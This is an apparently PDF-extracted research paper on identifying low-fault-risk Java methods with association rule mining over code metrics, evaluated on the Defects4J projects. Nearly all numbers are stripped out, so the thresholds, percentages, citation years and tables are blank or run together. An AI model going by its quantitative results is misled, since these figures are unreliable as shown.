association rule mining is a technique for identifying relations between variables in a large dataset and was introduced by agrawal, imieliński & swami ( ). a dataset contains transactions consisting of a set of items that are binary attributes. an association rule represents a logical implication of the form {antecedent} ⇒ {consequent} and expresses that the consequent is likely to apply if the antecedent applies. antecedent and consequent both consist of a set of items and are disjoint. the support of a rule expresses the proportion of the transactions that contain both antecedent and consequent out of all transactions. the support of an itemset x with respect to all transactions t is defined as supp(x) = |{t ∈ t : x ⊆ t}| / |t|. it is related to the significance of the itemset (simon, kumar & li, ). the confidence of a rule expresses the proportion of the transactions that contain both antecedent and consequent out of all transactions that contain the antecedent. the confidence of a rule x ⇒ y is defined as conf(x ⇒ y) = supp(x ∪ y) / supp(x). it can be considered as the precision (simon, kumar & li, ). a rule is redundant if a more general rule with the same or a higher confidence value exists (bayardo, agrawal & gunopulos, ). association rule mining has been successfully applied in defect prediction studies (song et al., ; czibula, marian & czibula, ; ma et al., ; zafar et al., ). a major advantage of association rule mining is the natural comprehensibility of the rules (simon, kumar & li, ). other commonly used machine-learning algorithms for defect prediction, such as support vector machines or naive bayes classifiers, generate black-box models, which lack interpretability. even decision trees can be difficult to interpret due to the subtree-replication problem (simon, kumar & li, ).
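to make the support and confidence measures concrete, the following minimal sketch (not part of the original study; the item names and toy transactions are invented) computes both values for a rule of the form used later in this paper, {metric items} ⇒ {notfaulty}.

```java
import java.util.HashSet;
import java.util.List;
import java.util.Set;

// Toy illustration of support and confidence for an association rule
// {antecedent} => {consequent}; transactions and item names are invented.
public class RuleMeasures {

    // supp(X): proportion of transactions that contain every item of X
    static double support(Set<String> itemset, List<Set<String>> transactions) {
        long matches = transactions.stream().filter(t -> t.containsAll(itemset)).count();
        return (double) matches / transactions.size();
    }

    // conf(X => Y) = supp(X u Y) / supp(X)
    static double confidence(Set<String> antecedent, Set<String> consequent,
                             List<Set<String>> transactions) {
        Set<String> union = new HashSet<>(antecedent);
        union.addAll(consequent);
        return support(union, transactions) / support(antecedent, transactions);
    }

    public static void main(String[] args) {
        List<Set<String>> transactions = List.of(
                Set.of("slocLessThan10", "noMethodInvocations", "notFaulty"),
                Set.of("slocLessThan10", "noMethodInvocations", "notFaulty"),
                Set.of("slocLessThan10", "methodInvocations", "notFaulty"),
                Set.of("slocLessThan10", "noMethodInvocations", "faulty"));

        Set<String> antecedent = Set.of("slocLessThan10", "noMethodInvocations");
        Set<String> consequent = Set.of("notFaulty");

        Set<String> rule = new HashSet<>(antecedent);
        rule.addAll(consequent);
        System.out.println(support(rule, transactions));                      // 0.5
        System.out.println(confidence(antecedent, consequent, transactions)); // 0.666...
    }
}
```

on this toy data the rule {slocLessThan10, noMethodInvocations} ⇒ {notFaulty} holds with support 1/2 and confidence 2/3; in the study, such rules are mined automatically and only sufficiently frequent, high-confidence ones are kept.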
another advantage of association rule mining is that the gained rules implicitly extract high-order interactions among the predictors. related work defect prediction is an important research area that has been extensively studied (hall et al., ; catal & diri, ). defect prediction models use code metrics (menzies, greenwald & frank, ; nagappan, ball & zeller, ; d’ambros, lanza & robbes, ; zimmermann, premraj & zeller, ), change metrics (nagappan & ball, ; hassan, ; kim et al., ), or a variety of further metrics (such as code ownership (bird et al., ; rahman & devanbu, ), developer interactions (meneely et al., ; niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee et al., ), dependencies to binaries (zimmermann & nagappan, ), mutants (bowes et al., ), code smells (palomba et al., ) to predict code areas that are especially defect-prone. such models allow software engineers to focus quality-assurance efforts on these areas and thereby support a more efficient resource allocation (menzies, greenwald & frank, ; weyuker & ostrand, ). defect prediction is usually performed at the component, package or file level (nagappan & ball, ; nagappan, ball & zeller, ; bacchelli, d’ambros & lanza, ; scanniello et al., ). recently, more fine-grained prediction models have been proposed to narrow down the scope for quality-assurance activities. kim, whitehead & zhang ( ) presented a model to classify software changes. hata, mizuno & kikuno ( ) applied defect prediction at the method level and showed that fine-grained prediction outperforms coarse-grained prediction at the file or package level if efforts to find the faults are considered. giger et al. ( ) also investigated prediction models at the method level and concluded that a random forest model operating on change metrics can achieve good performance. more recently, pascarella, palomba & bacchelli ( ) replicated this study and confirmed the results. however, they reported that a more realistic inter-release evaluation of the models shows a dramatic drop in performance with results close to that of a random classifier and concluded that method-level bug prediction is still an open challenge (pascarella, palomba & bacchelli, ). it is considered difficult to achieve sufficiently good data quality at the method level (hata, mizuno & kikuno, ; shippey et al., ); publicly available datasets have been provided in shippey et al. ( ), just, jalali & ernst ( ), and giger et al. ( ). cross-project defect prediction predicts defects in projects for which no historical data exists by using models trained on data of other projects (zimmermann et al., ; xia et al., ). he et al. ( ) investigated the usability of cross-project defect prediction. they reported that cross-project defect prediction works only in few cases and requires careful selection of training data. zimmermann et al. ( ) also provided empirical evidence that cross-project prediction is a serious problem. they stated that projects in the same domain cannot be used to build accurate prediction models without quantifying, understanding, and evaluating process, data and domain. similar findings were obtained by turhan et al. ( ), who investigated the use of cross-company data for building prediction models. they found that models using cross-company data can only be “useful in extreme cases such as mission-critical projects, where the cost of false alarms can be afforded” and suggested using within-company data if available. 
while some recent studies reported advances in cross-project defect prediction (xia et al., ; zhang et al., ; xu et al., ), it is still considered as a challenging task. our work differs from the above-mentioned work in the target setting: we do not predict artifacts that are fault-prone, but instead identify artifacts (methods) that are very unlikely to contain any faults. while defect prediction aims to detect as many faults as possible (without too many false positives), and thus strives for a high recall (mende & koschke, ), our idp approach strives to identify those methods that are not fault-prone to a high certainty. therefore, we optimized our approach toward the precision in detecting lfr methods. to the best of our knowledge, this is the first work to niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ study lfr methods. moreover, as far as we know, cross-project prediction has not yet been applied at the method level. to perform the classification, we applied association rule mining. association rule mining has previously been applied with success in defect prediction (song et al., ; morisaki et al., ; czibula, marian & czibula, ; ma et al., ; karthik & manikandan, ; zafar et al., ). idp approach this section describes the idp approach, which identifies lfr methods. the approach comprises the computation of source-code metrics for each method, the data pre- processing before the mining, and the association rule mining. figure illustrates the steps. metric computation like defect prediction models, idp uses metrics to train a classifier for identifying lfr methods. for each method, we compute the source-code metrics listed in table that we considered relevant to judge whether a method is trivial. they comprise established length and complexity metrics used in defect prediction, metrics regarding occurrences of programming-language constructs, and categories describing the purpose of a method. sloc is the number of source lines of code, that is, loc without empty lines and comments. cyclomatic complexity corresponds to the metric proposed by mccabe ( ). despite this metric being controversial (shepperd, ; hummel, )—due to the fact that it is not actionable, difficult to interpret, and high values do not necessarily translate to low readability—it is commonly used as variable in defect prediction (menzies et al., , ; zimmermann, premraj & zeller, ). furthermore, a low number of paths through a method could be relevant for identifying lfr methods. figure overview of the approach. metrics for faulty methods are computed at the faulty state; metrics for non-faulty methods are computed at the state of the last bug-fix commit. full-size doi: . /peerj-cs. /fig- niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ maximum nesting depth corresponds to the “maximum number of encapsulated scopes inside the body of the method” (ndepend, ). deeply nested code is more difficult to understand, therefore, it could be more fault-prone. maximum method chaining expresses the maximum number of chain elements of a method invocation. we consider a method call to be chained if it is directly invoked on the result from the previous method invocation. 
the value for a method is zero if it does not contain any method invocations, one if no method invocation is chained, or otherwise the maximum number of chain elements (e.g., two for getid().tostring(), three for getid().tostring(). substring( )). unique variable identifiers counts the distinct names of variables that are used within the method. the following metrics, metrics m –m , count the occurrences of the respective java language construct (gosling et al., ). next, we derive further metrics from the existing ones. they are redundant, but correlated metrics do not have any negative effects on association rule mining (except on the computation time) and may improve the results for the following reason: if an item generated from a metric is not frequent, rules with this item will be discarded because they cannot achieve the minimum support; however, an item for a more general metric may be more frequent and survive. the derived metrics are: � all conditions, which sums up if conditions, switch-case blocks, and ternary operations (m + m + m ) � all arithmetic operations, which sums up incrementations, decrementations, and arithmetic infix operations (m + m ) furthermore, we compute to which of the following categories a method belongs (a method can belong to zero, one, or more categories): � constructors: special methods that create and initialize an instance of a class. they might be less fault-prone because they often only set class variables or delegate to another constructor. � getters: methods that return a class or instance variable. they usually consist of a single statement and can be generated by the ide. � setters: methods that set the value of a class or instance variable. they usually consist of a single statement and can be generated by the ide. � empty methods: non-abstract methods without any statements. they often exist to meet an implemented interface, or because the default logic is to do nothing and is supposed to be overridden in certain sub-classes. � delegation methods: methods that delegate the call to another method with the same name and further parameters. they often do not contain any logic besides the delegation. � tostring methods: implementations of java’s tostring method. they are often used only for debugging purposes and can be generated by the ide. note that we only use source-code metrics and do not consider process metrics. this is because we want to identify methods that exhibit a lfr due to their code. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ association rule mining computes frequent item sets from categorical attributes; therefore, our next step is to discretize the numerical metrics. in defect prediction, discretization is also applied to the metrics: shivaji et al. ( ) and mccallum & nigam ( ) reported that table computed metrics for each method. 
metric name type m source lines of code (sloc) length m cyclomatic complexity (cc) complexity m maximum nesting depth maximum value m maximum method chaining maximum value m unique variable identifiers unique count m anonymous class declarations count m arithmetic in- or decrementations count m arithmetic infix operations count m array accesses count m array creations count m assignments count m boolean operators count m cast expressions count m catch clauses count m comparison operators count m if conditions count m inner method declarations count m instance-of checks count m instantiations count m loops count m method invocations count m null checks count m null literals count m return statements count m string literals count m super-method invocations count m switch-case blocks count m synchronized blocks count m ternary operations count m throw statements count m try blocks count m all conditions count m all arithmetic operations count m is constructor boolean m is setter boolean m is getter boolean m is empty method boolean m is delegation method boolean m is tostring method boolean niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ binary values can yield better results than using counts when the number of features is low. we discretize as follows: � for each of the metrics m –m , we inspect their distribution and create three classes. the first class is for metric values until the first tertile, the second class for values until the second tertile, and the third class for the remaining values. � for all count metrics (including the derived ones), we create a binary “has-no”-metric, which is true if the value is zero, e.g., countloops = ⇒ noloops = true. � for the method categories (setter, getter, : : : ), no transformation is necessary as they are already binary. data pre-processing at this point, we assume that we have a list of faulty methods with their metrics at the faulty state (the list may contain a method multiple times if it was fixed multiple times) and a list of all methods. faulty methods can be obtained by identifying methods that were changed in bug-fix commits (zimmermann, premraj & zeller, ; giger et al., ; shippey et al., ). a method is considered as faulty when it was faulty at least once in its history; otherwise it is considered as not faulty. we describe in “fault data extraction” how we extracted faulty methods from the defects j dataset. prior to applying the mining algorithm, we have ( ) to address faulty methods with multiple occurrences, ( ) to create a unified list of faulty and non-faulty methods, and ( ) to tackle dataset imbalance. steps ( ) and ( ) require that a method can be uniquely identified. to satisfy this requirement, we identified a method by its name, its parameter types, and the qualified name of its surrounding class. we integrated the computation of the metrics into the source-code analysis tool teamscale (heinemann, hummel & steidl, ; haas, niedermayr & jurgens, ), which is aware of the code history and tracks method genealogies. thereby, teamscale detects method renames or parameter changes so that we could update the method identifier when it changed. ( ) a method may be fixed multiple times; in this case, a method appears multiple times in the list of the faulty methods. however, each method should have the same weight and should therefore be considered only once. 
consequently, we consolidate multiple occurrences of the same method: we replace all occurrences by a new instance and apply majority voting to aggregate the binary metric values. it is common practice in defect prediction to have a single instance of every method with a flag that indicates whether a method was faulty at least once (menzies et al., ; giger et al., ; shippey et al., ; mende & koschke, ). ( ) to create a unified dataset, we take the list of all methods, remove those methods that exist in the set of the faulty methods, and add the set of the faulty methods with the metrics computed at the faulty state. after doing that, we end up with a list containing each method exactly once and a flag indicating whether a method was faulty or not. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ( ) defect datasets are often highly imbalanced (khoshgoftaar, gao & seliya, ), with faulty methods being underrepresented. therefore, we apply smote , a well- known algorithm for over- and under-sampling, to address imbalance in the dataset used for training (longadge, dongre & malik, ; chawla et al., ). it artificially generates new entries of the minority class using the nearest neighbors of these cases and reduces entries from the majority class (torgo, ). if we do not apply smote to highly imbalanced datasets, many non-expressive rules will be generated when most methods are not faulty. for example, if % of the methods are not faulty and % of them contain a method invocation, rules with high support will be generated that use this association to identify non-faulty methods. balancing avoids those nonsense rules. idp classifier to identify lfr methods, we compute association rules of the type {metric , metric , metric , : : : } / {notfaulty}. examples for the metrics are sloclowestthird, nonullchecks, issetter. a method that satisfies all metric predicates of a rule is not faulty to the certainty expressed by the confidence of the rule. the support of the rule expresses how many methods with these characteristics exist, and thus, it shows how generalizable the rule is. after computing the rules on a training set, we remove redundant ones (see “association rule mining”) and order the remaining rules first descending by their confidence and then by their support. to build the lfr classifier, we combine the top n association rules with the highest confidence values using the logical-or operator. hence, we consider a method to have a lfr if at least one of the top n rules matches. to determine n, we compute the maximum number of rules until the faulty methods in the lfr methods exceed a certain threshold in the training set. of course, idp can also be used with other machine-learning algorithms. we decided to use association rule mining because of the natural comprehensibility of the rules (see “association rule mining”) and because we achieved a better performance compared to models we trained using random forest. empirical study this section reports on the empirical study that we conducted to evaluate the idp approach. research questions we investigate the following questions to research how well methods that contain hardly any faults can be identified and to study whether idp is applicable in cross-project scenarios. rq : what is the precision of the classifier for low-fault-risk methods? 
to evaluate the precision of the classifier, we investigate how many methods that are classified as “lfr” (due to the triviality of their code) are faulty. if we want to use the lfr classifier for determining methods that require less focus during quality assurance (qa) activities, synthetic minority over-sampling technique. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ such as testing and code reviews, we need to be sure that these methods contain hardly any faults. rq : how large is the fraction of the code base consisting of methods classified as “low fault risk”? we study how common lfr methods are in code bases to find out how much code is of lower importance for quality-assurance activities. we want to determine which savings potential can arise if these methods are excluded from qa. rq : is a trained classifier for methods with low fault risk generalizable to other projects? cross-project defect prediction is used to predict faults in (new) projects, for which no historical fault data exists, by using models trained on other projects. it is considered a challenging task in defect prediction (he et al., ; zimmermann et al., ; turhan et al., ). as we expect that the characteristics of lfr methods might be project-independent, idp could be applicable in a cross-project scenario. therefore, we investigate how generalizable our idp classifier is for cross-project use. rq : how does the classifier perform compared to a traditional defect prediction approach? the main purpose of defect prediction is to detect fault-prone code. most traditional defect prediction approaches are binary classifications, which classify a method either as (likely) faulty or not faulty. hence, they implicitly also detect methods with a lfr. therefore, we compare the performance of our classifier with the performance of a traditional defect prediction approach. study objects for our analysis, we used data from defects j, which was created by just, jalali & ernst ( ). defects j is a database and analysis framework that provides real faults for six real-world open-source projects written in java. for each fault, the original commit before the bug fix (faulty version), the original commit after the bug fix (fixed version), and a minimal patch of the bug fix are provided. the patch is minimal such that it contains only code changes that ( ) fix the fault and ( ) are necessary to keep the code compilable (e.g., when a bug fix involves method-signature changes). it does not contain changes that do not influence the semantics (e.g., changes in comments, local renamings), and changes that were included in the bug-fix commit but are not related to the actual fault (e.g., refactorings). due to the manual analysis, this dataset at the method level is much more precise than other datasets at the same level, such as shippey et al. ( ) and giger et al. ( ), which were generated from version control systems and issue trackers without further manual filtering. the authors of just, jalali & ernst ( ) confirmed that they considered every bug fix within a given time span. table presents the study objects and their characteristics. we computed the metrics sloc and #methods for the code revision at the last bug-fix commit of each project; the numbers do not comprise sample and test code. #faulty methods corresponds to the number of faulty methods derived from the dataset. 
fault data extraction defects j provides for each project a set of reverse patches , which represent bug fixes. to obtain the list of methods that were at least once faulty, we conducted the following a reverse patch reverts previous changes. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ steps for each patch. first, we checked out the source code from the project repository at the original bug-fix commit and stored it as fixed version. second, we applied the reverse patch to the fixed version to get to the code before the bug fix and stored the resulting faulty version. next, we analyzed the two versions created for every patch. for each file that was changed between the faulty and the fixed version, we parsed the source code to identify the methods. we then mapped the code changes to the methods to determine which methods were touched in the bug fix. after that, we had the list of faulty methods. figure summarizes these steps. we inspected all bug-fix patches and found that method changes in the patches do not represent bug fixes. while the patches are minimal, such that they contain only bug-related changes (see “study objects”), these ten method changes are semantic- preserving, only necessary because of changed signatures of other methods in the patch, and therefore included in defects j to keep the code compilable. figure presents an example. although these methods are part of the bug fix, they were not changed semantically and do not represent faulty methods. therefore, we decided to remove them from the faulty methods in our analysis. the names of these ten methods are provided in the dataset to this paper (niedermayr, röhm & wagner, ). table study objects. name sloc #methods #faulty methods jfreechart (chart) . k . k google closure compiler . k . k apache commons lang . k . k apache commons math . k . k mockito . k . k joda time . k . k b e cc f f f faulty # c e ed fixed # ce cleaned reverse patch fa f figure derivation of faulty methods. the original bug-fix commit c e ed to fix the faulty version f f f may contain unrelated changes. defect j provides a reverse patch, which contains only the actual fix. we applied it to the fixed version c e ed to get to fa f we then identified methods that were touched by the patch and computed their metrics at state fa f . full-size doi: . /peerj-cs. /fig- niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ procedure after extracting the faulty methods from the dataset, we computed the metrics listed in “idp approach.” we computed them for all faulty methods at their faulty version and for all methods of the application code at the state of the fixed version of the last patch. we used eclipse jdt ast (http://www.eclipse.org/jdt/) to create an ast visitor for computing the metrics. for all further processing, we used the statistical computing software r (r core team, ). to discretize the metrics m –m , we first computed their value distribution. figure shows that their values are not normally distributed (most values are very small). to create three classes for each of these metrics , we sorted the metric values, and computed the values at the end of the first and at the end of the second third. 
we then put all methods until the last occurrence of the value at the end of the first third into class , all methods until the last occurrence of the value at the end of the second third into class , and all other methods into class . table presents the value ranges of the resulting classes. the classes are the same for all six projects. we then aggregated multiple faulty occurrences of the same method (this occurs if a method is changed in more than one bug-fix patch) and created a unified dataset of faulty and non-faulty methods (see “data pre-processing”). next, we split the dataset into a training and a test set. for rq and rq , we used -fold cross-validation (witten et al., , chapter ). using the caret package (from jed wing et al. ( )), we randomly sampled the dataset of each project into ten stratified partitions of equal sizes. each partition is used once for testing the classifier, which is trained on the remaining nine partitions. to compute the association rules for rq —in which we study how generalizable the classifier is—for each project, we used the methods of the other five projects as training set for the classifier. before computing association rules, we applied the smote algorithm from the dmwr package (torgo, ) with a % over-sampling and a % under-sampling rate to each training set. after that, each training set was equally balanced ( % faulty methods, % non-faulty methods) . figure example of method change without behavior modification to preserve api compatibility. the method escapejavascript(string) invokes escapejavastylestring(string, boolean, boolean). a further parameter was added to the invoked method; therefore, it was necessary to adjust the invocation in escapejavascript(string). for invocations with the parameter value true, the behavior does not change (lang, patch , simplified). full-size doi: . /peerj-cs. /fig- code without sample and test code. we did not use the ntile function to create classes, because it always generates classes of the same size, such that instances with the same value may end up in different classes (e.g., if % of the methods have the complexity value , the first . % will end up in class , and the remaining . % with the same value will end up in class ). we computed the results for the empirical study once with and once without addressing the data imbalance in the training set. the prediction perfor- mance was better when applying smote, therefore, we decided to use it. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.eclipse.org/jdt/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we then used the implementation of the apriori algorithm (agrawal & srikant, ) in the arules package (hahsler, gruen & hornik, ; hahsler et al., ) to compute association rules with notfaulty as target item (rule consequent). we set the threshold for the minimum support to % and the threshold for the minimum confidence to % (support and confidence are explained in “association rule mining”). we experimented with different thresholds and these values produced good results (results for other configurations are in the dataset provided with this paper; niedermayr, röhm & wagner, ). the minimum support avoids overly infrequent (i.e., non-generalizable) rules from being created, and the minimum confidence prevents the creation of imprecise rules. note that no rule (with notfaulty as rule consequent) can reach a higher support than % after the smote pre-processing. 
after computing the rules, we removed redundant ones using the corresponding function from the apriori package. we then sorted the remaining rules descending by their confidence. using these rules, we created two classifiers to identify lfr methods. they differ in the number of comprised rules. the strict classifier uses the top n rules until the share of faulty methods in all methods (of the training set) exceeds . % in the lfr methods (of the training set). the more lenient classifier uses the top n rules until the share exceeds % in the lfr methods. (example: we applied the top one rule to the training set, then applied the next rule, : : : , until the matched methods in the training set contained table generated classes and their value ranges. metric class class class sloc [ ; ] [ ; ] [ ;∞) cyclomatic complexity [ ; ] [ ; ] [ ;∞) maximum nesting depth [ ; ] [ ; ] [ ;∞) maximum method chaining [ ; ] [ ; ] [ ;∞) unique variable identifiers [ ; ] [ ; ] [ ;∞) figure metrics m –m are not normally distributed. (a) sloc, (b) cyclomatic complexity, (c) maximum nesting depth, (d) maximum method chaining, and (e) unique variable identifiers. full-size doi: . /peerj-cs. /fig- niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . % out of all faults). figure presents how an increase in the number of selected rules affects the proportion of lfr methods and the share of faulty methods that they contain. for rq and rq , the classifiers were computed for each fold of each project. for rq , the classifiers were computed once for each project. to answer rq , we used -fold cross-validation to evaluate the classifiers separately for each project. we computed the number and proportion of methods that were classified as “lfr” but contained a fault (≈ false positives). furthermore, we computed precision and recall. our main goal is to identify those methods that we can say, with high certainty, contain hardly any faults. therefore, we consider it as more important to achieve a high precision than to predict all methods that do not contain any faults in the dataset. as the dataset is imbalanced with faulty methods in the minority, the proportion of faults in lfr methods might not be sufficient to assess the classifiers (smote was applied only to the training set). therefore, we further computed the fault-density reduction, which describes how much less likely the lfr methods contain a fault. for example, if % of all methods are classified as “lfr” and contain % of all faults, the factor is . it can also be read as: % of all methods contain only one fourth of the expected faults. we mathematically define the fault-density reduction factor based on methods as proportion of lfr methods out of all methods proportion of faulty lfr methods out of all faulty methods and based on sloc as proportion of sloc in lfr methods out of all sloc proportion of faulty lfr methods out of all faulty methods : for both classifiers (strict variant with . %, lenient variant with %), we present the metrics for each project and the resulting median. to answer rq , we assessed how common methods classified as “lfr” are. for each project, we computed the absolute number of lfr methods, their proportion out of all methods, and their extent by considering their sloc. lfr sloc corresponds to the sum of sloc of all lfr methods. the proportion of lfr sloc is computed out of all sloc of the project. 
% % % % % number of rules figure influence of the number of selected rules (lang). the number of rules influences the — proportion of low-fault-risk (lfr) methods and the — share of faulty methods in lfr out of all faulty methods. full-size doi: . /peerj-cs. /fig- niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to answer rq , we computed the association rules for each project with the methods of the other five projects as training data. like in rq and rq , we determined the number of used top n rules with the same thresholds ( . % and %). to allow a comparison with the within-project classifiers, we computed the same metrics like in rq and rq . to answer rq , we computed for each method the code and change metrics that were used in giger et al. ( ). the metrics and their descriptions are listed in table . we applied random forest as machine learning algorithm and configured it like in the paper of giger et al. ( ). we computed the results for within-project predictions using -fold cross-validation and we further computed the results for cross-project predictions like in rq . we present the same evaluation metrics as in the previous research questions. results this section presents the results to the research questions. the data to reproduce the results is available at (niedermayr, röhm & wagner, ). table rq : code and change metrics used in giger et al. ( ). metric name description code metrics fanin number of methods that reference a given method fanout number of methods referenced by a given method localvar number of local variables in the body of a method parameters number of parameters in the declaration commenttocoderatio ratio of comments to source code (line-based) countpath number of possible paths in the body of a method complexity mccabe cyclomatic complexity of a method execstmt number of executable source code statements maxnesting maximum nested depth of all control structures change metrics methodhistories number of times a method was changed authors number of distinct authors that changed a method stmtadded sum of all source code statements added to a method body maxstmtadded maximum number of source code statements added to a method body avgstmtadded average number of source code statements added to a method body stmtdeleted sum of all source code statements deleted from a method body maxstmtdeleted maximum number of source code statements deleted from a method body avgstmtdeleted average number of source code statements deleted from a method body churn sum of churn (stmtadded—stmtdeleted) maxchurn maximum churn avgchurn average churn decl number of method declaration changes cond number of condition expression changes in a method body elseadded number of added else-parts in a method body elsedeleted number of deleted else-parts from a method body niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rq : what is the precision of the classifier for low-fault-risk methods? table presents the results. the methods classified to have lfr by the stricter classifier, which allows a maximum fault share of . % in the lfr methods in the (balanced) training data, contain between two and eight faulty methods per project. the more lenient classifier, which allows a maximum fault share of %, classified between four and faulty methods as lfr. 
the median proportion of faulty methods in lfr methods is . % resp. . %. the fault-density reduction factor for the stricter classifier ranges between . and . (median: . ) when considering methods and between . and . (median: . ) when considering sloc. in the project lang, . % of all methods with . % of the sloc are classified as lfr and contain . % of all faults, thus, the factor is . (sloc-based: . ). the factor never falls below for both classifiers. table exemplarily presents the top three rules for lang. methods that work with fewer than two variables and do not invoke any methods as well as short methods without arithmetic operations, cast expressions, and method invocations are highly unlikely to contain a fault. rq : how large is the fraction of the code base consisting of methods classified as “low fault risk”? table presents the results. the stricter classifier classified between . % and table rq , rq : evaluation of within-project idp to identify low-fault-risk (lfr) methods. project faults in lfr lfr methods lfr methods lfr sloc lfr methods contain : : : % of all faults fault-density reduction # % prec rec # % # % (methods) (sloc) within-project idp, -fold: min. support = %, min. confidence = %, rules until fault share in training set = . % chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % . % , . % . % . . math . % . % . % . % . % . % . . mockito . % . % . % . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . within-project idp, -fold: min. support = %, min. confidence = %, rules until fault share in training set = % chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % . % , . % . % . . math . % . % . % . % . % . % . . mockito . % . % . % , . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . idp can identify methods with lfr. on average, only . % of the methods classified as “lfr” by the strict classifier are faulty. the identified lfr methods are, on average, . times less likely to contain a fault than an arbitrary method in the dataset. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . % of the methods as lfr (median: . %, mean: . %), the more lenient classifier matched between . % and . % of the methods (median: . %, mean: . %). the median of the comprised sloc in lfr methods is . % (mean: . %) respectively . % (mean: . %). rq : is a trained classifier for methods with low fault risk generalizable to other projects? table presents the results for the cross-project prediction with training table top three association rules for lang (within-project, fold ). # rule support (%) confidence (%) {uniquevariableidentifierslessthan , nomethodinvocations} ⇒ {notfaulty} . . {sloclessthan , nomethodinvocations, noarithmeticoperations} ⇒ {notfaulty} . . {sloclessthan , nomethodinvocations, nocastexpressions} ⇒ {notfaulty} . . table rq : evaluation of cross-project idp. project faults in lfr lfr methods lfr methods lfr sloc lfr methods contain : : : % of all faults fault-density reduction # % prec. rec. # % # % (methods) (sloc) cross-project idp: min. support = %, min. confidence = %, rules until fault share in training set = . % chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % . % , . % . % . . math . % . % . % . % , . % . % . . mockito . % . % . % . % , . % . % . . time . % . % . % , . % , . % . % . 
. median . % . % . % . % . % . % . . cross-project idp: min. support = %, min. confidence = %, rules until fault share in training set = % chart . % . % . % , . % , . % . % . . closure . % . % . % , . % , . % . % . . lang . % . % . % . % , . % . % . . math . % . % . % . % , . % . % . . mockito . % . % . % . % , . % . % . . time . % . % . % , . % , . % . % . . median . % . % . % . % . % . % . . using within-project idp, on average, – % of the methods, comprising about – % of the sloc, can be assigned a lower importance during testing. in the best case, when ignoring . % of the methods ( . % of the sloc), it is still possible to catch . % of the faults (math). niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data from the respective other projects. compared to the results of the within-project prediction, except for math, the number of faults in lfr methods decreased or stayed the same in all projects for both classifier variants. while the median proportion of faults in lfr methods slightly decreased, the proportion of lfr methods also decreased in all projects except math. the median proportion of lfr methods is . % (sloc: . %) for the stricter classifier and . % (sloc: . %) for the more lenient classifier. the fault-density reduction improved compared to the within-project prediction for both the method and sloc level in both classifier variants: for the stricter classifier, the median of the method-based factor is . (+ . ); the median of the sloc-based factor is . (+ . ). figure illustrates the fault-density reduction for both within-project (rq , rq ) and cross-project (rq ) prediction. rq : how does the classifier perform compared to a traditional defect prediction approach? table presents the results of the within- and cross-project prediction according to the approach by giger et al. ( ). in the within-project prediction scenario, the classifier predicts on average . % of the methods to be non-faulty. as a consequence, the average recall regarding non-faulty methods reaches . %. however, the number of methods that are classified as non-faulty but actually contain a fault increases by magnitudes compared to the idp approach (i.e., precision deteriorates). for example, % of closure’s faulty methods are wrongly classified as non-faulty. the median fault-density reduction is . at the method level (strict idp: . ) and . when considering sloc (strict idp: . ). consequently, methods classified by the traditional approach to have a lfr are still less likely to contain a fault than other methods, but the difference is not as high as in the idp classifier. chart closure lang math mockito time fa ul t− de ns ity r ed uc tio n (m et ho ds ) figure comparison of the idp within-project ( . %, . %) with the idp cross-project ( . %, . %) classifiers (method-based). the fault-density reduction expresses how much less likely a lfr method contains a fault (definition in procedure). higher values are better (example: if % of the methods are lfr and contain % of all faults, the factor is ). the dashed line is at one; no value falls below. full-size doi: . /peerj-cs. /fig- using cross-project idp, on average, – % of the methods, comprising about – % of the sloc, can be classified as “lfr.” the methods classified by the stricter classifier contain, on average, less than one eleventh of the expected faults. niedermayr et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . 
